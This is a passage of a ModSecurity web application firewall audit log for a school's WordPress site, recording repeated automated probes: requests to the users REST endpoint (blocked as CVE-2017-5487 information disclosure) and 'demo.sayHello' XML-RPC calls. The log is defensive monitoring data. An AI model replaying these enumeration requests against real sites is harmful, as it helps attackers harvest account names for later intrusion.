Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441588187175 3070 (- - -) Stopwatch2: 1747441588187175 3070; combined=1280, p1=424, p2=827, p3=0, p4=0, p5=29, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b0bae4d-Z-- --7f5f682a-A-- [17/May/2025:07:26:35 +0700] aCfXuxKi5m5upc8uMd6hzQAAAMA 103.236.140.4 42788 103.236.140.4 8181 --7f5f682a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.167.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.167.183 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7f5f682a-C-- demo.sayHello --7f5f682a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f5f682a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441595882111 5208 (- - -) Stopwatch2: 1747441595882111 5208; combined=3890, p1=513, p2=3167, p3=29, p4=32, p5=89, sr=72, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f5f682a-Z-- --220d7707-A-- [17/May/2025:07:27:12 +0700] aCfX4HyxdQCiyU1ENFcm7AAAABU 103.236.140.4 42792 103.236.140.4 8181 --220d7707-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.94 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --220d7707-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --220d7707-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441632297965 3276 (- - -) Stopwatch2: 1747441632297965 3276; combined=1451, p1=512, p2=907, p3=0, p4=0, p5=32, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --220d7707-Z-- --0714de22-A-- [17/May/2025:07:27:18 +0700] aCfX5nyxdQCiyU1ENFcm7gAAAAA 103.236.140.4 42796 103.236.140.4 8181 --0714de22-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.94 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0714de22-C-- demo.sayHello --0714de22-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0714de22-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441638649834 6508 (- - -) Stopwatch2: 1747441638649834 6508; combined=4723, p1=630, p2=3855, p3=38, p4=42, p5=95, sr=78, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0714de22-Z-- --ae7a0944-A-- [17/May/2025:07:28:07 +0700] aCfYF3yxdQCiyU1ENFcm7wAAAAE 103.236.140.4 42800 103.236.140.4 8181 --ae7a0944-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.184 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.184 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ae7a0944-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ae7a0944-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441687766893 2920 (- - -) Stopwatch2: 1747441687766893 2920; combined=1333, p1=467, p2=836, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae7a0944-Z-- --121e3161-A-- [17/May/2025:07:28:15 +0700] aCfYH3yxdQCiyU1ENFcm8QAAAAM 103.236.140.4 42804 103.236.140.4 8181 --121e3161-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.184 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.184 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --121e3161-C-- demo.sayHello --121e3161-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --121e3161-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441695844763 5646 (- - -) Stopwatch2: 1747441695844763 5646; combined=4131, p1=559, p2=3342, p3=33, p4=36, p5=96, sr=78, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --121e3161-Z-- --6e5e9f0b-A-- [17/May/2025:07:28:46 +0700] aCfYPnyxdQCiyU1ENFcm8wAAAAY 103.236.140.4 42808 103.236.140.4 8181 --6e5e9f0b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.152 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6e5e9f0b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e5e9f0b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441726408054 3004 (- - -) Stopwatch2: 1747441726408054 3004; combined=1339, p1=467, p2=841, p3=0, p4=0, p5=30, sr=84, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e5e9f0b-Z-- --5db8dd4b-A-- [17/May/2025:07:28:53 +0700] aCfYRXyxdQCiyU1ENFcm9QAAAAk 103.236.140.4 42812 103.236.140.4 8181 --5db8dd4b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.152 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5db8dd4b-C-- demo.sayHello --5db8dd4b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5db8dd4b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441733688277 5723 (- - -) Stopwatch2: 1747441733688277 5723; combined=4164, p1=537, p2=3406, p3=32, p4=35, p5=92, sr=77, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5db8dd4b-Z-- --6619750f-A-- [17/May/2025:07:29:35 +0700] aCfYb3yxdQCiyU1ENFcm-AAAABA 103.236.140.4 42818 103.236.140.4 8181 --6619750f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.203 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.203 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6619750f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6619750f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441775094771 2914 (- - -) Stopwatch2: 1747441775094771 2914; combined=1189, p1=424, p2=739, p3=0, p4=0, p5=26, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6619750f-Z-- --fb8f7f14-A-- [17/May/2025:07:29:40 +0700] aCfYdHyxdQCiyU1ENFcm-QAAABE 103.236.140.4 42822 103.236.140.4 8181 --fb8f7f14-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.203 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.203 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fb8f7f14-C-- demo.sayHello --fb8f7f14-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb8f7f14-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441780889587 5337 (- - -) Stopwatch2: 1747441780889587 5337; combined=4013, p1=527, p2=3272, p3=29, p4=32, p5=91, sr=76, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb8f7f14-Z-- --92b8d656-A-- [17/May/2025:07:30:30 +0700] aCfYpnyxdQCiyU1ENFcm-wAAABI 103.236.140.4 42826 103.236.140.4 8181 --92b8d656-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.190.125 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.190.125 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --92b8d656-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --92b8d656-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441830867911 2682 (- - -) Stopwatch2: 1747441830867911 2682; combined=1089, p1=386, p2=680, p3=0, p4=0, p5=23, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92b8d656-Z-- --daae8838-A-- [17/May/2025:07:30:39 +0700] aCfYr-m4kjNN-hEbWjJAvAAAAEw 103.236.140.4 42834 103.236.140.4 8181 --daae8838-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.190.125 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.190.125 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --daae8838-C-- demo.sayHello --daae8838-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --daae8838-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441839167837 6818 (- - -) Stopwatch2: 1747441839167837 6818; combined=4928, p1=626, p2=3888, p3=38, p4=43, p5=182, sr=83, sw=151, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --daae8838-Z-- --a8c0a31d-A-- [17/May/2025:07:33:08 +0700] aCfZRHyxdQCiyU1ENFcnAQAAAAQ 103.236.140.4 42846 103.236.140.4 8181 --a8c0a31d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.202.148 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.202.148 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a8c0a31d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8c0a31d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441988430882 2824 (- - -) Stopwatch2: 1747441988430882 2824; combined=1259, p1=449, p2=779, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8c0a31d-Z-- --4776230f-A-- [17/May/2025:07:33:13 +0700] aCfZSXyxdQCiyU1ENFcnBAAAAAg 103.236.140.4 42854 103.236.140.4 8181 --4776230f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.202.148 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.202.148 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4776230f-C-- demo.sayHello --4776230f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4776230f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441993833388 6103 (- - -) Stopwatch2: 1747441993833388 6103; combined=4712, p1=571, p2=3897, p3=39, p4=43, p5=97, sr=75, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4776230f-Z-- --1396b23f-A-- [17/May/2025:07:36:33 +0700] aCfaEXyxdQCiyU1ENFcnDAAAAAE 103.236.140.4 42882 103.236.140.4 8181 --1396b23f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.247 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.247 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1396b23f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1396b23f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747442193851111 2992 (- - -) Stopwatch2: 1747442193851111 2992; combined=1360, p1=471, p2=859, p3=0, p4=0, p5=30, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1396b23f-Z-- --ecc65b19-A-- [17/May/2025:07:36:39 +0700] aCfaF3yxdQCiyU1ENFcnDgAAAAM 103.236.140.4 42886 103.236.140.4 8181 --ecc65b19-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.247 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.247 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ecc65b19-C-- demo.sayHello --ecc65b19-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ecc65b19-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747442199443950 4484 (- - -) Stopwatch2: 1747442199443950 4484; combined=3554, p1=431, p2=2893, p3=23, p4=24, p5=105, sr=67, sw=78, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ecc65b19-Z-- --ddd22e48-A-- [17/May/2025:07:36:56 +0700] aCfaKHyxdQCiyU1ENFcnDwAAAAQ 103.236.140.4 42890 103.236.140.4 8181 --ddd22e48-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.165.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.165.21 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ddd22e48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ddd22e48-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747442216277733 2894 (- - -) Stopwatch2: 1747442216277733 2894; combined=1265, p1=450, p2=785, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ddd22e48-Z-- --0c2af94d-A-- [17/May/2025:07:37:00 +0700] aCfaLOm4kjNN-hEbWjJAwQAAAFI 103.236.140.4 42894 103.236.140.4 8181 --0c2af94d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.165.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.165.21 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0c2af94d-C-- demo.sayHello --0c2af94d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php 